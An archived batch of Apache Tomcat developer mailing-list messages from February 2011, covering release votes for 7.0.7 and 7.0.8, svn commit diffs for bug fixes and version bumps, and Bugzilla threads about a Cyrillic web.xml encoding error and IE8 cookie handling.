Re: [VOTE] Release Apache Tomcat 7.0.7
On 03/02/2011 13:32, Mark Thomas wrote: The proposed Apache Tomcat 7.0.7 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/ The proposed 7.0.7 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.7 Alpha [ ] Beta - go ahead and release as 7.0.7 Beta [X] Stable - go ahead and release as 7.0.7 Stable TCK passed. Been on running on ASF Jira for 8+ hours with no issue (there was an OOME but all indications are that was triggered by Jira usage not a Tomcat bug). Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.7
On 04/02/2011 09:24, Mark Thomas wrote: On 03/02/2011 13:32, Mark Thomas wrote: The proposed Apache Tomcat 7.0.7 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/ The proposed 7.0.7 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.7 Alpha [ ] Beta - go ahead and release as 7.0.7 Beta [X] Stable - go ahead and release as 7.0.7 Stable TCK passed. Been on running on ASF Jira for 8+ hours with no issue (there was an OOME but all indications are that was triggered by Jira usage not a Tomcat bug). I should have read my e-mail before sending this. Without the fix in r1067072, it is easy to flood the logs with stack traces. I'm changing my vote to broken and I'll tag 7.0.8 shortly. Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067127 - /tomcat/trunk/webapps/docs/changelog.xml
Author: markt Date: Fri Feb 4 10:02:38 2011 New Revision: 1067127 URL: http://svn.apache.org/viewvc?rev=1067127view=rev Log: Update changelog Modified: tomcat/trunk/webapps/docs/changelog.xml Modified: tomcat/trunk/webapps/docs/changelog.xml URL: http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067127r1=1067126r2=1067127view=diff == --- tomcat/trunk/webapps/docs/changelog.xml (original) +++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 10:02:38 2011 @@ -49,7 +49,15 @@ /fix /changelog /subsection - subsection name=Catalina + subsection name=Coyote +changelog + fix +Reduce level of log message for invalid URL parameters from WARNING to +INFO. (markt) + /fix +/changelog + /subsection + subsection name=Other changelog fix Align server.xml installed by the Windows installer with the one @@ -59,7 +67,7 @@ /changelog /subsection /section -section name=Tomcat 7.0.7 (markt) +section name=Tomcat 7.0.7 (markt) rtext=not released subsection name=Catalina changelog fix - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067134 - in /tomcat/trunk: java/org/apache/catalina/core/ApplicationContextFacade.java webapps/docs/changelog.xml
Author: markt
Date: Fri Feb 4 10:30:36 2011
New Revision: 1067134
URL: http://svn.apache.org/viewvc?rev=1067134view=rev
Log:
Fix https://issues.apache.org/bugzilla/show_bug.cgi?id=50709
Make ApplicationContextFacade non-final to enable extension.
Modified:
tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java
tomcat/trunk/webapps/docs/changelog.xml
Modified:
tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java
URL:
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java?rev=1067134r1=1067133r2=1067134view=diff
==
--- tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java
(original)
+++ tomcat/trunk/java/org/apache/catalina/core/ApplicationContextFacade.java
Fri Feb 4 10:30:36 2011
@@ -59,8 +59,7 @@ import org.apache.tomcat.util.ExceptionU
* @version $Id$
*/
-public final class ApplicationContextFacade
-implements ServletContext {
+public class ApplicationContextFacade implements ServletContext {
// -- Attributes
/**
Modified: tomcat/trunk/webapps/docs/changelog.xml
URL:
http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067134r1=1067133r2=1067134view=diff
==
--- tomcat/trunk/webapps/docs/changelog.xml (original)
+++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 10:30:36 2011
@@ -47,6 +47,10 @@
fix
Fix NPE in CoyoteAdapter when postParseRequest() call fails. (kkolinko)
/fix
+ fix
+ bug50709/bug: Make codeApplicationContextFacade/code non-final
to
+ enable extension. (markt)
+ /fix
/changelog
/subsection
subsection name=Coyote
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 50709] Make class org.apache.catalina.core.ApplicationContextFacade non-final
https://issues.apache.org/bugzilla/show_bug.cgi?id=50709 Mark Thomas ma...@apache.org changed: What|Removed |Added Status|NEW |RESOLVED Resolution||FIXED --- Comment #1 from Mark Thomas ma...@apache.org 2011-02-04 05:30:54 EST --- Fixed in 7.0.x and will be included in 7.0.8 onwards. -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067139 - /tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java
Author: markt
Date: Fri Feb 4 10:38:09 2011
New Revision: 1067139
URL: http://svn.apache.org/viewvc?rev=1067139view=rev
Log:
Follow up to r1067039
Modified:
tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java
Modified: tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java
URL:
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java?rev=1067139r1=1067138r2=1067139view=diff
==
--- tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java (original)
+++ tomcat/trunk/java/org/apache/tomcat/util/http/Parameters.java Fri Feb 4
10:38:09 2011
@@ -297,7 +297,7 @@ public final class Parameters {
msg.append(origValue.toString());
msg.append(' has been ignored.);
log.debug(msg, e);
-} else {
+} else if (log.isInfoEnabled()) {
msg.append(tmpName.toString());
msg.append(' with value ');
msg.append(tmpValue.toString());
@@ -305,7 +305,7 @@ public final class Parameters {
msg.append(value quoted here may be corrupted due to );
msg.append(the failed decoding. Use debug level logging
);
msg.append(to see the original, non-corrupted values.);
-log.warn(msg);
+log.info(msg);
}
}
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067147 - in /tomcat/trunk: java/org/apache/catalina/security/SecurityClassLoad.java webapps/docs/changelog.xml
Author: markt
Date: Fri Feb 4 11:07:18 2011
New Revision: 1067147
URL: http://svn.apache.org/viewvc?rev=1067147view=rev
Log:
Fix security exception when running under a SecurityManager
Modified:
tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java
tomcat/trunk/webapps/docs/changelog.xml
Modified: tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java
URL:
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java?rev=1067147r1=1067146r2=1067147view=diff
==
--- tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java
(original)
+++ tomcat/trunk/java/org/apache/catalina/security/SecurityClassLoad.java Fri
Feb 4 11:07:18 2011
@@ -131,6 +131,9 @@ public final class SecurityClassLoad {
throws Exception {
final String basePackage = org.apache.coyote.;
loader.loadClass(basePackage + http11.AbstractOutputBuffer$1);
+// Make sure system property is read at this point
+Class? clazz = loader.loadClass(basePackage + Constants);
+clazz.newInstance();
}
Modified: tomcat/trunk/webapps/docs/changelog.xml
URL:
http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067147r1=1067146r2=1067147view=diff
==
--- tomcat/trunk/webapps/docs/changelog.xml (original)
+++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 11:07:18 2011
@@ -51,6 +51,10 @@
bug50709/bug: Make codeApplicationContextFacade/code non-final
to
enable extension. (markt)
/fix
+ fix
+When running under a security manager, user requests may fail with a
+security exception. (markt)
+ /fix
/changelog
/subsection
subsection name=Coyote
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067151 - /tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java
Author: mturk
Date: Fri Feb 4 11:16:14 2011
New Revision: 1067151
URL: http://svn.apache.org/viewvc?rev=1067151view=rev
Log:
Do not send flush packet if explicit is false
Modified:
tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java
Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java
URL:
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java?rev=1067151r1=1067150r2=1067151view=diff
==
--- tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java (original)
+++ tomcat/trunk/java/org/apache/coyote/ajp/AjpProcessor.java Fri Feb 4
11:16:14 2011
@@ -578,7 +578,7 @@ public class AjpProcessor extends Abstra
*/
@Override
protected void flush(boolean explicit) throws IOException {
-if (!finished) {
+if (explicit !finished) {
// Send the flush message
output.write(flushMessageArray);
}
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 50709] Make class org.apache.catalina.core.ApplicationContextFacade non-final
https://issues.apache.org/bugzilla/show_bug.cgi?id=50709 --- Comment #2 from gvage...@gmail.com 2011-02-04 07:03:39 EST --- Thanks a lot. George -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067161 - in /tomcat/trunk: java/org/apache/coyote/ajp/AjpAprProtocol.java webapps/docs/changelog.xml
Author: markt
Date: Fri Feb 4 12:18:00 2011
New Revision: 1067161
URL: http://svn.apache.org/viewvc?rev=1067161view=rev
Log:
Fix hanging Servlet 3 asynchronous requests when using the APR based AJP
connector.
Modified:
tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java
tomcat/trunk/webapps/docs/changelog.xml
Modified: tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java
URL:
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java?rev=1067161r1=1067160r2=1067161view=diff
==
--- tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java (original)
+++ tomcat/trunk/java/org/apache/coyote/ajp/AjpAprProtocol.java Fri Feb 4
12:18:00 2011
@@ -195,6 +195,7 @@ public class AjpAprProtocol extends Abst
// Need to make socket available for next processing cycle
// but no need for the poller
connections.put(socket, processor);
+socket.setAsync(true);
} else {
if (state == SocketState.OPEN) {
connections.put(socket, processor);
Modified: tomcat/trunk/webapps/docs/changelog.xml
URL:
http://svn.apache.org/viewvc/tomcat/trunk/webapps/docs/changelog.xml?rev=1067161r1=1067160r2=1067161view=diff
==
--- tomcat/trunk/webapps/docs/changelog.xml (original)
+++ tomcat/trunk/webapps/docs/changelog.xml Fri Feb 4 12:18:00 2011
@@ -63,6 +63,10 @@
Reduce level of log message for invalid URL parameters from WARNING to
INFO. (markt)
/fix
+ fix
+Fix hanging Servlet 3 asynchronous requests when using the APR based
AJP
+connector. (markt)
+ /fix
/changelog
/subsection
subsection name=Other
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067169 - in /tomcat/tc7.0.x/tags/TOMCAT_7_0_8: ./ build.properties.default modules/
Author: markt Date: Fri Feb 4 12:45:08 2011 New Revision: 1067169 URL: http://svn.apache.org/viewvc?rev=1067169view=rev Log: Tag 7.0.8 Added: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ (props changed) - copied from r1067167, tomcat/trunk/ Removed: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/modules/ Modified: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default Propchange: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ -- --- svn:ignore (added) +++ svn:ignore Fri Feb 4 12:45:08 2011 @@ -0,0 +1,5 @@ +.* +output +build.properties +work +logs Propchange: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ -- svn:mergeinfo = /tomcat/tc6.0.x/trunk:742915 Modified: tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default URL: http://svn.apache.org/viewvc/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default?rev=1067169r1=1067167r2=1067169view=diff == --- tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default (original) +++ tomcat/tc7.0.x/tags/TOMCAT_7_0_8/build.properties.default Fri Feb 4 12:45:08 2011 @@ -29,7 +29,7 @@ version.major=7 version.minor=0 version.build=8 version.patch=0 -version.suffix=-dev +version.suffix= # - Build control flags - # Note enabling validation uses Checkstyle which is LGPL licensed - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067170 - /tomcat/trunk/build.properties.default
Author: markt Date: Fri Feb 4 12:46:06 2011 New Revision: 1067170 URL: http://svn.apache.org/viewvc?rev=1067170view=rev Log: Bump version Modified: tomcat/trunk/build.properties.default Modified: tomcat/trunk/build.properties.default URL: http://svn.apache.org/viewvc/tomcat/trunk/build.properties.default?rev=1067170r1=1067169r2=1067170view=diff == --- tomcat/trunk/build.properties.default (original) +++ tomcat/trunk/build.properties.default Fri Feb 4 12:46:06 2011 @@ -27,7 +27,7 @@ # - Version Control Flags - version.major=7 version.minor=0 -version.build=8 +version.build=9 version.patch=0 version.suffix=-dev - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[RESULT] [VOTE] Release Apache Tomcat 7.0.7
On 03/02/2011 13:32, Mark Thomas wrote: The proposed Apache Tomcat 7.0.7 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.7/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_7/ The proposed 7.0.7 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.7 Alpha [ ] Beta - go ahead and release as 7.0.7 Beta [ ] Stable - go ahead and release as 7.0.7 Stable Due to a TCK failure with the APR-AJP connector and the NPE in the CoyoteAdapter, 7.0.7 is broken. 7.0.8 has been tagged and is being uploaded as I type. As soon as it is uploaded, I'll start the vote. Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
I am using web.xml in it simplest, incomlete form (note that making it 100% Servlet API 3.0 compliant does not help) ?xml version=1.0 encoding=Windows-1251? web-app !-- below are word testing Testoviy in cyrillic, try to use another symbols -- display-nameТестовый web.xml/display-name servlet servlet-nameTestJSPMount/servlet-name jsp-file/test.jsp/jsp-file /servlet servlet-mapping servlet-nameTestJSPMount/servlet-name url-pattern/test.html/url-pattern /servlet-mapping /web-app During startup, tomcat throws exception: 04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: Invalid byte 2 of 2-byte UTF-8 sequence. at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.invalidByte(Unknown Source) at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.read(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.load(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.peekChar(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(Unknown Source) at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(Unknown Source) at org.apache.jasper.xmlparser.ParserUtils.parseXMLDocument(ParserUtils.java:96) at org.apache.jasper.compiler.JspConfig.processWebDotXml(JspConfig.java:83) at org.apache.jasper.compiler.JspConfig.init(JspConfig.java:231) at org.apache.jasper.compiler.JspConfig.findJspProperty(JspConfig.java:290) at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:113) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:365) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:345) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:332) at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:594) at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:342) at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:391) at org.apache.jasper.servlet.JspServlet.init(JspServlet.java:128) at org.apache.catalina.core.StandardWrapper.initServlet(StandardWrapper.java:1133) at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1087) at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:996) at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:4741) at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5062) at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5057) at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source) at java.util.concurrent.FutureTask.run(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.lang.Thread.run(Unknown Source) Platform in use: Tomcat 7.0.6 JDK 1.6.0_18 x86 Windows 7 x64 If I change encoding of web.xml to UTF-8 it does not help also. The only fix for this problem is to use only ISO-8859-1 characters. I believe it is somehow related to some early initialization sequence, when jsp is mapped as servlet. With kindest personal regards, Ruslan Gainutdinov rusla...@gmail.com - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
On 04/02/2011 13:18, Huksley wrote: During startup, tomcat throws exception: 04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception Please create a Bugzilla entry for this. Cheers, Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[VOTE] Release Apache Tomcat 7.0.8
The proposed Apache Tomcat 7.0.8 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ The proposed 7.0.8 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.8 Alpha [ ] Beta - go ahead and release as 7.0.8 Beta [ ] Stable - go ahead and release as 7.0.8 Stable Cheers, Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 50720] New: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
https://issues.apache.org/bugzilla/show_bug.cgi?id=50720 Summary: When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml Product: Tomcat 7 Version: 7.0.6 Platform: PC Status: NEW Severity: normal Priority: P2 Component: Catalina AssignedTo: dev@tomcat.apache.org ReportedBy: cont...@ruslan.org Created an attachment (id=26605) -- (https://issues.apache.org/bugzilla/attachment.cgi?id=26605) Simple test web application I am using web.xml in it simplest, incomlete form (note that making it 100% Servlet API 3.0 compliant does not help) ?xml version=1.0 encoding=Windows-1251? web-app !-- below are word testing Testoviy in cyrillic, try to use another symbols -- display-nameТестовый web.xml/display-name servlet servlet-nameTestJSPMount/servlet-name jsp-file/test.jsp/jsp-file /servlet servlet-mapping servlet-nameTestJSPMount/servlet-name url-pattern/test.html/url-pattern /servlet-mapping /web-app During startup, tomcat throws exception: 04/02/2011 16:07:39 S - - StandardContext.loadOnStartup: Servlet /testcyrwebxml threw load() exception com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: Invalid byte 2 of 2-byte UTF-8 sequence. at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.invalidByte(Unknown Source) at com.sun.org.apache.xerces.internal.impl.io.UTF8Reader.read(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.load(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLEntityScanner.peekChar(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(Unknown Source) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(Unknown Source) at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(Unknown Source) at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(Unknown Source) at org.apache.jasper.xmlparser.ParserUtils.parseXMLDocument(ParserUtils.java:96) at org.apache.jasper.compiler.JspConfig.processWebDotXml(JspConfig.java:83) at org.apache.jasper.compiler.JspConfig.init(JspConfig.java:231) at org.apache.jasper.compiler.JspConfig.findJspProperty(JspConfig.java:290) at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:113) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:365) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:345) at org.apache.jasper.compiler.Compiler.compile(Compiler.java:332) at org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:594) at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:342) at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:391) at org.apache.jasper.servlet.JspServlet.init(JspServlet.java:128) at org.apache.catalina.core.StandardWrapper.initServlet(StandardWrapper.java:1133) at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1087) at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:996) at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:4741) at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5062) at org.apache.catalina.core.StandardContext$3.call(StandardContext.java:5057) at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source) at java.util.concurrent.FutureTask.run(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(Unknown Source) at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.lang.Thread.run(Unknown Source) Platform in use: Tomcat 7.0.6 binary windows release JDK 1.6.0_18 x86 Windows 7 x64 If I change encoding of web.xml to UTF-8 it does not help also. The only fix for this problem is to use only ISO-8859-1 characters. I believe it is somehow related to some early initialization sequence, when jsp is mapped as servlet. -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
DO NOT REPLY [Bug 50720] When using jsp mapped as servlet in web.xml, cyrillic characters are not allowed in web.xml
https://issues.apache.org/bugzilla/show_bug.cgi?id=50720 Konstantin Kolinko knst.koli...@gmail.com changed: What|Removed |Added OS/Version||All --- Comment #1 from Konstantin Kolinko knst.koli...@gmail.com 2011-02-04 09:12:28 EST --- This is caused by the following line in o.a.j.compiler.WebXml.java: is = new ByteArrayInputStream(webXml.getBytes()); The above uses system encoding to convert MERGED_WEB_XML from String to byte[]. Actually InputStream is not needed there. One should use new InputSource(Reader). -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[Tomcat Wiki] Update of PoweredBy by Ultimate Fighter
Dear Wiki user,
You have subscribed to a wiki page or wiki category on Tomcat Wiki for change
notification.
The PoweredBy page has been changed by Ultimate Fighter.
http://wiki.apache.org/tomcat/PoweredBy?action=diffrev1=311rev2=312
--
[[http://www.handybundle-finden.de/|HandyBundle-Finden]] - German site for
mobile phone bundles. Based on a custom developed lucene based nosql database
and running on tomcat.
=== Handytarife-Finden ===
- {{http://www.handytarife-finden.de/images/Logo.png}}
[[http://www.handytarife-finden.de/|Handytarife-Finden]] - This ist a very fast
search site for mobile phones and bundles. It works with an lucene based nosql
database and running on an System consisting of nginx and tomcat.
+ {{http://www.handytarife-finden.de/images/logo.png}}
[[http://www.handytarife-finden.de/|Handytarife-Finden]] - This ist a very fast
search site for mobile phones and bundles. It works with an lucene based nosql
database and running on an System consisting of nginx and tomcat.
=== Maxager ===
[http://www.maxager.com/home.htm ] Maxager's patented enterprise profit
optimization (EPO) solutions help leading companies increase cash and profit
worth 3-5% of revenue.
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525 Bmeist br...@tigernet.com changed: What|Removed |Added Status|RESOLVED|REOPENED Version|7.0.0 |7.0.6 Resolution|FIXED | OS/Version|Windows NT |Linux --- Comment #4 from Bmeist br...@tigernet.com 2011-02-04 11:09:55 EST --- I am seeing this exact problem on 7.0.6, but only Tomcat on Linux. I have another install of 7.0.6 on Windows and it works fine. This is the error I see in the logs: Feb 3, 2011 11:44:15 PM org.apache.tomcat.util.http.Cookies processCookieHeader INFO: Cookies: Invalid cookie. Value not a token or quoted value Again, this only happens on IE 8 hitting 7.0.6 on Linux. Unfortunately we have a LOT of IE 8 users. I rolled back to Tomcat 6 and it's working fine again. Thanks very much! -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525 Bmeist br...@tigernet.com changed: What|Removed |Added CC||br...@tigernet.com -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525 Mark Thomas ma...@apache.org changed: What|Removed |Added Status|REOPENED|RESOLVED Resolution||FIXED --- Comment #5 from Mark Thomas ma...@apache.org 2011-02-04 12:01:54 EST --- I've just checked this as Tomcat 7 does return / as the cookie path by default. From the error message, it looks like your client is sending mal-formed cookies. The users list is the place to get help with this - you need to provide an example cookie header that is failing. -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
DO NOT REPLY [Bug 50700] Context parameters are being overridden with parameters from the web application deployment descriptor
https://issues.apache.org/bugzilla/show_bug.cgi?id=50700 Oliver Doepner odoep...@gmail.com changed: What|Removed |Added OS/Version||All --- Comment #1 from Oliver Doepner odoep...@gmail.com 2011-02-04 13:52:27 EST --- I can reproduce the problem (Tomcat 6.0.30 on JDK6u23, Windows XP, 32bit, *.zip distribution). -- Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are the assignee for the bug. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.8
On 04/02/2011 13:52, Mark Thomas wrote: The proposed Apache Tomcat 7.0.8 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ The proposed 7.0.8 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.8 Alpha [ ] Beta - go ahead and release as 7.0.8 Beta [X] Stable - go ahead and release as 7.0.8 Stable TCKs all pass. ASF Jira has been running 7.0.8 since around 16.00 UTC without incident. Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
